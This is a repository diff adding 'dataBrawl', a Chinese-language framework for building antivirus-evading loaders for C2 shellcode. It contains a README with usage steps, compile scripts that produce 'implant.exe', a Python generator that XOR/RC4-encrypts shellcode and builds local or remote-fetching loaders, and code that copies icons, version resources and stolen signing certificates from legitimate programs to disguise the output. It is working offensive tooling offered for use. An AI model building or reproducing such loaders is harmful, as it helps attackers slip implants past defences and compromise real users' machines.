v1.0

README.MD

@@ -0,0 +1,83 @@
+# dataBrawl
+
+一款一键化生成免杀木马的shellcode免杀框架，具备**本地加载**方式和**远程加载**方式。
+
+（本工具没有追求多而全的加载方式，去除经多次测试无效的加载技术，保留了最实用最接近APT的利用方式。）
+
+**目前已支持：**
+
+1. 分离加载shellcode
+2. XOR/RC4 加密
+3. 堆加密
+4. 自定义sleep混淆
+5. 自定义GetProcAddress/GetModuleHandle
+6. 回调执行shellcode
+7. 一键添加资源信息
+8. ...
+
+
+
+**待更新：**
+
+1. 将bin转换成图片加载
+2. 更多的反沙箱、反分析方式，更多的内存对抗等
+
+
+
+
+
+
+
+## 环境准备
+
+本工具使用mingw编译，需要准备好编译环境，下载mingw编译器：
+
+官网地址：https://www.mingw-w64.org/
+
+Windows下载链接： https://sourceforge.net/projects/mingw-w64/files/
+
+我下载的是x86_64-win32-seh，具体请根据系统情况适配，也可以直接下载online installer
+
+<img src="./assets/image-20240417134130271.png" alt="image-20240417134130271" style="zoom:50%;" />
+
+
+
+添加系统环境变量：
+
+path = 解压目录/mingw64/bin
+
+最好把include和lib也对应添加到环境变量的include和lib中，以免编译找不到链接库
+
+
+
+## 使用说明
+
+```
+python dataBrawl.py -h
+```
+
+![image-20240417132855251](./assets/image-20240417132855251.png)
+
+#### 远程加载shellcode
+
+CS或其他C2生成shellcode
+
+![image-20240417140327230](./assets/image-20240417140327230.png)
+
+生成处理后的bin文件
+
+```shell
+python dataBrawl.py remote D:\Dev\dataBrawl-1.0\calc.bin -c 1
+```
+
+将生成在根目录的encrypt.bin上传到服务器
+
+```shell
+python main.py remote http://127.0.0.1/xorcalc.bin -i D:\Typora\Typora.exe
+```
+
+![image-20240417132140197](./assets/image-20240417132140197.png)
+
+
+
+![image-20240417132323764](./assets/image-20240417132323764.png)

compile/compile_x32.bat

@@ -0,0 +1 @@
+gcc new_loader.cpp -mwindows -m32 -o implant.exe

compile/compile_x32_remote.bat

@@ -0,0 +1 @@
+gcc new_loader.cpp -mwindows -m32 -lwinhttp -o implant.exe -lstdc++ -static

compile/compile_x64.bat

@@ -0,0 +1 @@
+gcc new_loader.cpp -mwindows -m64 -o implant.exe

compile/compile_x64_remote.bat

@@ -0,0 +1 @@
+gcc new_loader.cpp -mwindows -m64 -lwinhttp -o implant.exe -lstdc++ -static

dataBrawl.py

@@ -0,0 +1,128 @@
+import argparse
+import os
+import re
+from util import bin,encrypt,compile,bin2pic
+from sign import sign
+from time import sleep
+from urllib.parse import urlparse
+
+
+tempalte_arr = ['basic','dynamic','demo']
+
+if __name__ == '__main__':
+    banner = '''
+      ╔╗  ╔╗   ╔══╗          ╔╗
+      ║║ ╔╝╚╗  ║╔╗║          ║║
+    ╔═╝╠═╩╗╔╬══╣╚╝╚╦═╦══╦╗╔╗╔╣║
+    ║╔╗║╔╗║║║╔╗║╔═╗║╔╣╔╗║╚╝╚╝║║
+    ║╚╝║╔╗║╚╣╔╗║╚═╝║║║╔╗╠╗╔╗╔╣╚╗  V1.0
+    ╚══╩╝╚╩═╩╝╚╩═══╩╝╚╝╚╝╚╝╚╝╚═╝  By [email protected]
+    '''
+    print(banner)
+    parser = argparse.ArgumentParser(description="shellcode 免杀框架", formatter_class=argparse.RawDescriptionHelpFormatter)
+    parser.add_argument('type', type=str, choices=["local", "remote"],help='选择本地免杀或分离免杀（分离效果更好，bin_filepath填写远程文件下载地址），使用分离免杀会默认指定template',default="local")
+    parser.add_argument('bin_filepath', type=str, help='shellcode bin文件的地址')
+    parser.add_argument('-c', type=int, help='处理加密bin文件',default=None)
+    #parser.add_argument('-p', type=str, help='填写pic地址,生成混淆后的shellcode图片',default=None)
+    parser.add_argument('-t', type=str, choices=tempalte_arr,help='选择使用的模板',default="basic")
+    parser.add_argument('-a', type=int, choices=[32, 64],help='生成x64或x86位exe,默认为64位;',default=64)
+    parser.add_argument('-i', type=str, help='来源证书和资源的exe',default=None)
+    parser.add_argument('-o', type=str, help='输出结果,默认保存于项目根目录result.exe',default="..\\result.exe")
+    args = parser.parse_args()
+
+
+
+    bin_path = args.bin_filepath
+    template_name = args.t
+    payload_arch = args.a
+    source_filepath = args.i
+    result_filepath = args.o
+    loader_type = args.type
+
+    #进入分离免杀流程
+    if (loader_type == "remote"):
+        template_name = "remote"
+        # shellcode混淆成图片
+        if (args.c != None):
+            print("[+] 正在处理bin文件")
+            bin_path = args.bin_filepath
+            bytes_array = bin.bin_to_bytes_array(bin_path)
+            #对shellcode进行加密处理
+            #xor
+            xor_key = [0xbc,0xab,0xcb]
+            bytes_array = encrypt.xor_encrypt_bytes(bytes_array,xor_key)
+            with open("encrypt.bin","wb+") as f:
+                f.write(bytes_array)
+            # pic_path = args.p
+            # bin2pic.genPic(bytes_array,pic_path)
+            print("[+] 处理完成")
+            exit()
+
+        #提取URL内容
+        #bin_path = "http://149.104.24.116/xorcalc.bin"
+        parsed_url = urlparse(bin_path)
+        scheme = parsed_url.scheme
+        host = parsed_url.hostname
+        port = str(parsed_url.port if parsed_url.port else (443 if scheme == "https" else 80))
+        path = parsed_url.path
+        #生成newloader
+        print("[+] 正在生成new_loader.cpp")
+        template_path = compile.switch_template(template_name)
+        compile.new_loader_remote(template_path,host,port,path)
+
+
+    #本地免杀流程
+    elif (loader_type == "local"):    
+        template_path = compile.switch_template(template_name)
+        print(template_path)
+
+        hex_array = bin.bin_to_hex_array(bin_path)
+
+        #修改bin文件特征
+        hex_array.insert(0, '0x90')
+
+        #对数组进行加密处理
+        #xor
+        xor_key = ['0xbc', '0xab', '0xcb']
+        hex_array = encrypt.xor_encrypt(hex_array,xor_key)
+        #rc4
+        rc4_key = os.urandom(16)
+        ciphertext = encrypt.rc4enc(bytes(int(x, 16) for x in hex_array), rc4_key)
+
+        #生成替换字符串
+        #payload_str = "unsigned char payload[]  = {" + ", ".join(hex_array) + "};"
+        RC4_key_text = 'unsigned char RC4key[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in rc4_key) + ' };'
+        payload_text = 'unsigned char payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };'
+
+        print("[+] 正在生成new_loader.cpp")
+        compile.new_loader(template_path,payload_text,RC4_key_text)
+
+    #进入编译流程    
+    print("[+] 正在编译...")
+    compiled_filepath = compile.compilefile(payload_arch,loader_type)
+    if not os.path.exists("implant.exe"):
+        print("[-] 编译失败")
+        exit()
+    if source_filepath == None:
+        print("[-] 未指定签名和资源源文件,结果已生成于compile目录下")
+        exit()
+
+    #进入添加资源流程
+    print("[+] 正在添加签名/资源")
+
+    if os.path.exists(compiled_filepath):
+        sign.callResHacker(compiled_filepath,source_filepath,result_filepath)
+        #sign.callSigthief(compiled_filepath,source_filepath,result_filepath)
+        print("[+] 已完成，结果生成于",os.getcwd(),"\\",result_filepath)
+        print("[+] 正在删除过程文件...")
+        try:
+            sleep(3)
+            #os.remove("temp.exe")
+            os.remove("source.res")
+            os.remove("..\\compile\\implant.exe")
+            os.remove("..\\compile\\new_loader.cpp")
+            print("[+] 删除完成")
+        except:
+            print("[-] 删除失败，请自行删除")
+    else:
+        print("[-]生成失败")

sign/ResourceHacker.ini

@@ -0,0 +1,35 @@
+[Setup]
+left=188
+top=250
+width=1200
+height=660
+MaximizedState=0
+MenuEditMode=0
+DisableGridlines=0
+vsplit=300
+LastDir=D:\Dev\EntropyReducer-main\x64\Release
+ToolbarSize=3
+
+[MonospaceFont]
+Name=Courier New
+Size=9
+Color=-16777208
+Style=0
+
+[Font]
+Name=Tahoma
+Size=9
+Color=-16777208
+CharSet=1
+Style=0
+
+[MRU List]
+MRU1=D:\Dev\dataBrawl-1.0\compile\implant.exe
+MRU2=D:\Typora\Typora.exe
+MRU3=D:\Sublime Text\sublime_text.exe
+MRU4=D:\tuitui\tuitui.exe
+MRU5=D:\Dev\EntropyReducer-main\x64\Release\PoC.exe
+MRU6=D:\Dev\dataBrawl-1.0\result.exe
+MRU7=D:\Dev\dataBrawl-1.0\sign\mama1_original.exe
+MRU8=D:\Dev\dataBrawl-1.0\sign\mama1.exe
+

sign/sign.py

@@ -0,0 +1,24 @@
+import os
+from time import sleep
+from sign import sigthief
+import subprocess
+
+def callResHacker(target_file, source_file,result_file):
+    try:
+        script_dir = os.path.dirname(os.path.abspath(__file__))
+        os.chdir(script_dir)
+        subprocess.run(f"ResourceHacker.exe -open \"{source_file}\" -save source.res -action extract -mask ICONGROUP,VERSION INFO,MAINFEST,", shell=True, check=True)
+        sleep(3)
+        subprocess.run(f"ResourceHacker.exe -open \"{target_file}\" -action addskip -res source.res -save \"{result_file}\"", shell=True, check=True)
+
+        print("资源添加成功")
+    except FileNotFoundError as e:
+        print(f"错误: 文件未找到 - {e}")
+    except subprocess.CalledProcessError as e:
+        print(f"错误: 调用进程失败 - {e}")
+
+def callSigthief(temp_file,source_file,result_file):
+    targetfile = temp_file
+    outputfile = result_file
+    cert = sigthief.copyCert(source_file)
+    sigthief.writeCert(cert, targetfile, outputfile)